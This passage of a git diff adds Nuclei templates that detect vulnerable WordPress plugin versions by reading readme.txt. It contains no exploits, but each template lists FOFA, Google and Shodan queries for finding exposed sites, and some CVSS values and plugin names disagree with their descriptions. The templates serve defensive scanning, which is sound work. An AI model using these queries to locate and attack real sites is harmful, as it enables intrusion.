+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-sendgrid-mailer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml b/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml
new file mode 100644
index 0000000000..d07d5d5a96
--- /dev/null
+++ b/poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83
+
+info:
+ name: >
+ Easy Menu Manager | WPZest <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Easy Menu Manager | WPZest plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f60df43a-eef3-449d-96fd-b26e28361f81?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9366
+ metadata:
+ fofa-query: "wp-content/plugins/easy-menu-manager-wpzest/"
+ google-query: inurl:"/wp-content/plugins/easy-menu-manager-wpzest/"
+ shodan-query: 'vuln:CVE-2024-9366'
+ tags: cve,wordpress,wp-plugin,easy-menu-manager-wpzest,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/easy-menu-manager-wpzest/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "easy-menu-manager-wpzest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml b/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml
new file mode 100644
index 0000000000..ded2c085c2
--- /dev/null
+++ b/poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9373-21279f27679fbe0272aa43186143715d
+
+info:
+ name: >
+ Elemenda <= 0.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Elemenda plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9373
+ metadata:
+ fofa-query: "wp-content/plugins/elemenda/"
+ google-query: inurl:"/wp-content/plugins/elemenda/"
+ shodan-query: 'vuln:CVE-2024-9373'
+ tags: cve,wordpress,wp-plugin,elemenda,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/elemenda/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "elemenda"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml b/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml
new file mode 100644
index 0000000000..e9f932e670
--- /dev/null
+++ b/poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d
+
+info:
+ name: >
+ Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9382
+ metadata:
+ fofa-query: "wp-content/plugins/gantry/"
+ google-query: inurl:"/wp-content/plugins/gantry/"
+ shodan-query: 'vuln:CVE-2024-9382'
+ tags: cve,wordpress,wp-plugin,gantry,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gantry"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.21')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml b/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml
new file mode 100644
index 0000000000..db88722116
--- /dev/null
+++ b/poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73
+
+info:
+ name: >
+ Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Parcel Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-9383
+ metadata:
+ fofa-query: "wp-content/plugins/woo-parcel-pro/"
+ google-query: inurl:"/wp-content/plugins/woo-parcel-pro/"
+ shodan-query: 'vuln:CVE-2024-9383'
+ tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-parcel-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml b/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml
new file mode 100644
index 0000000000..50c8ed69e0
--- /dev/null
+++ b/poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9425-9969523487d164f3223d1b2ba16294e0
+
+info:
+ name: >
+ Advanced Category and Custom Taxonomy Image <= 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via ad_tax_image Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Advanced Category and Custom Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ad_tax_image shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9425
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-category-and-custom-taxonomy-image/"
+ google-query: inurl:"/wp-content/plugins/advanced-category-and-custom-taxonomy-image/"
+ shodan-query: 'vuln:CVE-2024-9425'
+ tags: cve,wordpress,wp-plugin,advanced-category-and-custom-taxonomy-image,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-category-and-custom-taxonomy-image/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-category-and-custom-taxonomy-image"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml b/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml
new file mode 100644
index 0000000000..0bdd8c206b
--- /dev/null
+++ b/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa
+
+info:
+ name: >
+ Branding <= 1.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9452
+ metadata:
+ fofa-query: "wp-content/plugins/branding/"
+ google-query: inurl:"/wp-content/plugins/branding/"
+ shodan-query: 'vuln:CVE-2024-9452'
+ tags: cve,wordpress,wp-plugin,branding,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/branding/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "branding"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9575.yaml b/poc/cve/CVE-2024-9575.yaml
new file mode 100644
index 0000000000..95abadcb5b
--- /dev/null
+++ b/poc/cve/CVE-2024-9575.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9575
+
+info:
+ name: >
+ pretix widget <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The pretix widget plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.0.5. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd106b92-48ee-46f4-b0a3-f595d227a0a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-9575
+ metadata:
+ fofa-query: "wp-content/plugins/pretix-widget/"
+ google-query: inurl:"/wp-content/plugins/pretix-widget/"
+ shodan-query: 'vuln:CVE-2024-9575'
+ tags: cve,wordpress,wp-plugin,pretix-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pretix-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pretix-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml b/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml
new file mode 100644
index 0000000000..1303fa5be8
--- /dev/null
+++ b/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f
+
+info:
+ name: >
+ Debrandify · Remove or Replace WordPress Branding <= 1.1.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Debrandify · Remove or Replace WordPress Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9674
+ metadata:
+ fofa-query: "wp-content/plugins/debrandify/"
+ google-query: inurl:"/wp-content/plugins/debrandify/"
+ shodan-query: 'vuln:CVE-2024-9674'
+ tags: cve,wordpress,wp-plugin,debrandify,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/debrandify/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "debrandify"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9689.yaml b/poc/cve/CVE-2024-9689.yaml
new file mode 100644
index 0000000000..55d2a4656a
--- /dev/null
+++ b/poc/cve/CVE-2024-9689.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9689
+
+info:
+ name: >
+ Post From Frontend <= 1.0.0 - Cross-Site Request Forgery to Arbitrary Post Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The Post From Frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c092629f-177c-4201-9fdd-defe47f85811?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-9689
+ metadata:
+ fofa-query: "wp-content/plugins/post-from-frontend/"
+ google-query: inurl:"/wp-content/plugins/post-from-frontend/"
+ shodan-query: 'vuln:CVE-2024-9689'
+ tags: cve,wordpress,wp-plugin,post-from-frontend,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-from-frontend/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-from-frontend"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml b/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml
new file mode 100644
index 0000000000..e6927e03ea
--- /dev/null
+++ b/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml
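Review bot: The `cvss-metrics` vector carries `UI:N` with `cvss-score: 5.3`, but the description says the forged request only works if a site administrator is tricked into an action such as clicking on a link, which is user interaction. The two Forminator CSRF templates in this commit (CVE-2024-9351, CVE-2024-9352) describe the same precondition and use `UI:R` with 4.3. The value may simply be what the referenced Wordfence record holds, so it is worth checking there before changing it; if the record agrees with the description, the lines would read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N` and `cvss-score: 4.3`.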
@@ -0,0 +1,59 @@
+id: CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea
+
+info:
+ name: >
+ Arconix Shortcodes <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef395956-477c-4970-becd-4f437e4807a3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9703
+ metadata:
+ fofa-query: "wp-content/plugins/arconix-shortcodes/"
+ google-query: inurl:"/wp-content/plugins/arconix-shortcodes/"
+ shodan-query: 'vuln:CVE-2024-9703'
+ tags: cve,wordpress,wp-plugin,arconix-shortcodes,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arconix-shortcodes"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml b/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml
new file mode 100644
index 0000000000..64786480d5
--- /dev/null
+++ b/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491
+
+info:
+ name: >
+ Product Customizer Light <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Product Customizer Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9848
+ metadata:
+ fofa-query: "wp-content/plugins/product-customizer-light/"
+ google-query: inurl:"/wp-content/plugins/product-customizer-light/"
+ shodan-query: 'vuln:CVE-2024-9848'
+ tags: cve,wordpress,wp-plugin,product-customizer-light,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/product-customizer-light/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "product-customizer-light"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9861.yaml b/poc/cve/CVE-2024-9861.yaml
new file mode 100644
index 0000000000..3912d83949
--- /dev/null
+++ b/poc/cve/CVE-2024-9861.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-9861 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Authentication Bypass + author: topscoder + severity: critical + description: > + The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.6.0. This is due to missing validation on the token being supplied during the otp login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the phone number associated with that user. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-9861 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:CVE-2024-9861' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9862.yaml b/poc/cve/CVE-2024-9862.yaml new file mode 100644 index 0000000000..88f8cfb92e --- /dev/null 
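Review bot: The only evidence this template collects is the `Stable tag` line of `readme.txt`, so a hit on `compare_versions(version, '<= 3.6.0')` shows a potentially affected version, not that the authentication bypass is actually present. A readme whose tag is non-numeric (for example `trunk`) never satisfies `([0-9.]+)`, and a blocked or stale readme gives no result or a misleading one, so a clean scan is not proof of a patched install. I would document that above the `http` block, e.g. `# Version check only (readme.txt Stable tag); confirm the installed plugin version before triage.` The same applies to every readme-based template in this commit, including CVE-2024-9848 before it.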
+++ b/poc/cve/CVE-2024-9862.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9862 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Unauthenticated Arbitrary User Password Change + author: topscoder + severity: critical + description: > + The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 3.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources, and the user current password check is missing. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9862 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:CVE-2024-9862' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9863.yaml b/poc/cve/CVE-2024-9863.yaml new file mode 100644 index 0000000000..5366839601 --- /dev/null +++ b/poc/cve/CVE-2024-9863.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9863 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Privilege Escalation via Registration due to Administrator Default User Role Value + author: topscoder + severity: critical + description: > + The UserPro plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.6.0 due to the insecure 'administrator' default value for the 'default_user_role' option. This makes it possible for unauthenticated attackers to register an administrator user even if the registration form is disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f04eab14-dd86-4145-b5eb-20d064bc8417?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9863 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + 